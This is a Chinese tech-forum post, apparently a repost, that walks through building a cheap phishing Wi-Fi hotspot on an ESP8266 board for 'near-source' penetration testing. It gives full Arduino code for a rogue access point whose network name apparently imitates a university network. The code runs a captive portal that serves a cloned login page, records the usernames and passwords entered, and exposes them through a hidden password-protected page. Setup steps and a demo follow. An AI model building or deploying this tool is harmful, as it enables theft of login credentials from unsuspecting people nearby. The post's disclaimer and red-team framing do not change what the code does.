设为首页 收藏本站

QQ登录

只需一步,快速开始

切换到宽版 切换风格

电脑疯子技术论坛|电脑极客社区

电脑疯子技术论坛|电脑极客社区»技术论坛 电脑疯子|资源分享 电脑教程分享 帖子
微信扫一扫 分享朋友圈

已有 1306 人浏览分享

近源渗透,超低成本打造自定义专属钓鱼WIFI

[复制链接]
1306 0
本帖最后由 zhaorong 于 2021-8-11 10:58 编辑

*严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。

在企业安全设备越来越多 边境安全防护越做越好的情况下 钓鱼攻击已经逐渐成为
了红蓝对抗演练的主要方法而随着邮件服务器WAF等设备的更新以及企业人员安
全意识的逐步提高,针对邮件钓鱼攻击也有了更多的防范措施。

在攻防演习 授权测试过程中,近源渗透与钓鱼攻击的组合拳能达到出其不意的效果但行
为有时也太过明显--手持MBP在目标附近转悠,且有被直接抓获的风险。活捉成就达成
于是笔者制作了一款钓鱼WIFI 特点是小型且不易被发现信号范
围广 其次是成本低 可将其安装在目标附近。

制作准备

硬件

ESP8266(某宝10元左右)

QQ截图20210811104009.png

电源模块(可选)

QQ截图20210811104046.png

软件

Arduino 1.8.13及以上

软件配置

Arduino - 首选项 - 附加开发版管理网址,添加如下网址

http://arduino.esp8266.com/stable/package_esp8266com_index.json
https://raw.githubusercontent.com/SpacehuhnTech/arduino/main/package_spacehuhn_index.json

QQ截图20210811104246.png

2. Arduino - 工具 - 开发板 - 开发板管理器 输入"esp8266" 点击查找 选择
esp8266 by ESP8266 Community"安装下载时建议使用代理。

QQ截图20210811104404.png

3. 下载ESP8266FS 将esp8266fs.jar放入Arduino根目录下的tools文件夹,以MacOS为例 格式为 /Applicatio
ns/Arduino.app/Contents/Java/tools/ESP8266FS/tool/esp8266fs.jar

制作钓鱼网页

此处以某认证系统为例。

下载网页

QQ截图20210811104507.png

修改登录接口为pass,用户名密码为user, pass。

QQ截图20210811104538.png

刷写ESP8266固件

Arduino - 文件 - 新建,新建项目。

QQ截图20210811104617.png

Arduino - 工具,配置开发板信息如下 需要注意端口的配置。

999.png

此处笔者直接贴出代码 并对代码做了详细注解 希望读者们认真阅读 重点代码在于接受传来
的数据并存储的过程,能够举一反三。
  1. #include <ESP8266WiFi.h>
  2. #include <DNSServer.h>
  3. #include <ESP8266WebServer.h>
  4. #include <WiFiClient.h>
  5. #include <FS.h>

  7. // DNS默认端口,无需修改
  8. const byte DNS_PORT = 53;

  10. // WIFI名称
  11. const char *ssid = "HUBU-STUDENT-PRO";

  13. // AP的IP地址(即网关地址)
  14. IPAddress apIP(192, 168, 1, 1);

  16. // 查看存储密码的密码
  17. String ppassword = "t123061";

  19. DNSServer dnsServer;
  20. ESP8266WebServer webServer(80);

  22. // 存储账号密码
  23. String data = "";

  25. // 认证页面
  26. String responseHTML = "<html><head><meta http-equiv="refresh" content="1;U
  27. RL='http://192.168.1.1/index.html'"></head></html>";

  29. // 登录失败页面
  30. String responseHTML_error = "<html><head><meta http-equiv="refresh" content="5;UR
  31. L='http://192.168.1.1/index.html'"><h3>没有找到符合条件的策略,5秒后返回</h3></head></html>";

  33. String getContentType(String filename){
  34.   if(webServer.hasArg("download")) return "application/octet-stream";
  35.   else if(filename.endsWith(".htm")) return "text/html";
  36.   else if(filename.endsWith(".html")) return "text/html";
  37.   else if(filename.endsWith(".css")) return "text/css";
  38.   else if(filename.endsWith(".js")) return "application/javascript";
  39.   else if(filename.endsWith(".png")) return "image/png";
  40.   else if(filename.endsWith(".gif")) return "image/gif";
  41.   else if(filename.endsWith(".jpg")) return "image/jpeg";
  42.   else if(filename.endsWith(".ico")) return "image/x-icon";
  43.   else if(filename.endsWith(".xml")) return "text/xml";
  44.   else if(filename.endsWith(".pdf")) return "application/x-pdf";
  45.   else if(filename.endsWith(".zip")) return "application/x-zip";
  46.   else if(filename.endsWith(".gz")) return "application/x-gzip";
  47.   return "text/plain";
  48. }


  51. // 查看存储的账号和密码
  52. void paw(){
  53.   if(webServer.arg("key")==ppassword){
  54.     webServer.send(200, "text/plain", data);
  55.   }else{
  56.     webServer.send(200, "text/html", responseHTML);
  57.   }
  58. }

  60. // 记录从钓鱼界面传过来的账号和密码
  61. void pass(){
  62.   if(webServer.arg("user") != "" && webServer.arg("pass") != ""){
  63.     data += "username:";
  64.     data += webServer.arg("user");
  65.     data += "----password:";
  66.     data += webServer.arg("pass");
  67.     data += "\r\n";
  68.     webServer.send(200, "text/html", responseHTML_error);
  69.   }
  70. }


  73. void background() {
  74.   File file = SPIFFS.open("/background.jpg", "r");
  75.   size_t sent = webServer.streamFile(file, "image/jpeg");
  76.   file.close();
  77.   return;
  78. }
  79. void bootstrap() {
  80.   File file = SPIFFS.open("/bootstrap.css", "r");
  81.   size_t sent = webServer.streamFile(file, "text/css");
  82.   file.close();
  83.   return;
  84. }
  85. void logo_r() {
  86.   File file = SPIFFS.open("/logo.png", "r");
  87.   size_t sent = webServer.streamFile(file, "image/png");
  88.   file.close();
  89.   return;
  90. }
  91. void favicon() {
  92.   File file = SPIFFS.open("/favicon.ico", "r");
  93.   size_t sent = webServer.streamFile(file, "image/x-icon");
  94.   file.close();
  95.   return;
  96. }
  97. void main_r() {
  98.   File file = SPIFFS.open("/main.css", "r");
  99.   size_t sent = webServer.streamFile(file, "text/css");
  100.   file.close();
  101.   return;
  102. }
  103. void middle_r() {
  104.   File file = SPIFFS.open("/middle.png", "r");
  105.   size_t sent = webServer.streamFile(file, "image/png");
  106.   file.close();
  107.   return;
  108. }
  109. void uname_r() {
  110.   File file = SPIFFS.open("/uname.png", "r");
  111.   size_t sent = webServer.streamFile(file, "image/png");
  112.   file.close();
  113.   return;
  114. }
  115. void upwd_r() {
  116.   File file = SPIFFS.open("/upwd.png", "r");
  117.   size_t sent = webServer.streamFile(file, "image/png");
  118.   file.close();
  119.   return;
  120. }
  121. void index_r(){
  122.   File file = SPIFFS.open("/index.html", "r");
  123.   size_t sent = webServer.streamFile(file, "text/html");
  124.   file.close();
  125.   return;
  126. }

  128. // 首页
  129. void handleRoot() {
  130.   File file = SPIFFS.open("/index.html", "r");
  131.   size_t sent = webServer.streamFile(file, "text/html");
  132.   file.close();
  133.   return;
  134. }

  136. void setup() {
  137.   // WIFI配置
  138.   Serial.begin(9600);
  139.   SPIFFS.begin();
  140.   WiFi.mode(WIFI_AP);
  141.   WiFi.softAPConfig(apIP, apIP, IPAddress(255, 255, 255, 0));
  142.   WiFi.softAP(ssid);

  144.   // DNS配置
  145.   dnsServer.start(DNS_PORT, "*", apIP);

  147.   // 配置404网页为首页
  148.   webServer.onNotFound([]() {
  149.     webServer.send(200, "text/html", responseHTML);
  150.   });

  152.   // 配置查看密码网页
  153.   webServer.on ("/key518", HTTP_GET, paw);
  154.   webServer.on("/", handleRoot);

  156.   // 配置登录接口
  157.   webServer.on("/pass", HTTP_GET, pass);

  159. webServer.on("/background.jpg", background);
  160. webServer.on("/bootstrap.css", bootstrap);
  161. webServer.on("/logo.png", logo_r);
  162. webServer.on("favicon.ico", favicon);
  163. webServer.on("/main.css", main_r);
  164. webServer.on("/middle.png", middle_r);
  165. webServer.on("/uname.png", uname_r);
  166. webServer.on("/upwd.png", upwd_r);

  168.   webServer.on("/index.html", index_r);
  169.   webServer.begin();
  170. }

  172. void loop() {
  173.   dnsServer.processNextRequest();
  174.   webServer.handleClient();
  175. }
复制代码

保存项目 会自动生成一个文件夹存储代码文件 根据步骤3配置好开发板与端口后 点击编译上传,等待上传成功。

998.png

在项目目录下新建data目录,将前端文件放入,然后使用ESP8266FS工具上传

997.png

996.png

到此制作已经全部完成

成品演示

连接WiFi

993.png

连接WiFi后自动弹出认证界面 输入用户密码test/test

点击登录后跳转到预置的登录失败界面

992.png

访问预置网址 http://192.168.1.1/key514?pass=t123061,收网

990.png

示例代码

https://github.com/piaolin/ProximalPhishing(仅供学习参考使用)

后记

文章中以某认证系统为例 在实际测试中 只需要下载目标认证界面修改
或自行编写界面,即可达到超低成本钓鱼效果。
经过不严谨的测试空地WiFi范围可达200m左右。
同时读者们可举一反三 对钓鱼方法及代码进行更加针对性的改动 此处不做过多赘述。
账号密码存储可写入存储而非内存 断电清空。

举报

回复
返回列表
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

zhaorong
VIP荣誉会员

1

关注

0

粉丝

9021

主题
精彩推荐
电脑疯子 GHOST WIN7 X64 快速装机版202001
电脑疯子 GHOST WIN7 X64 快速装机版202001
电脑疯子技术论坛GHOST WIN10X64 快速装机版201909
电脑疯子技术论坛GHOST WIN10X64 快速装机
电脑疯子 GHOST WIN7 X86 快速装机版202001
电脑疯子 GHOST WIN7 X86 快速装机版202001
电脑疯子技术论坛GHOST WIN10X86 快速装机版201909
电脑疯子技术论坛GHOST WIN10X86 快速装机
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.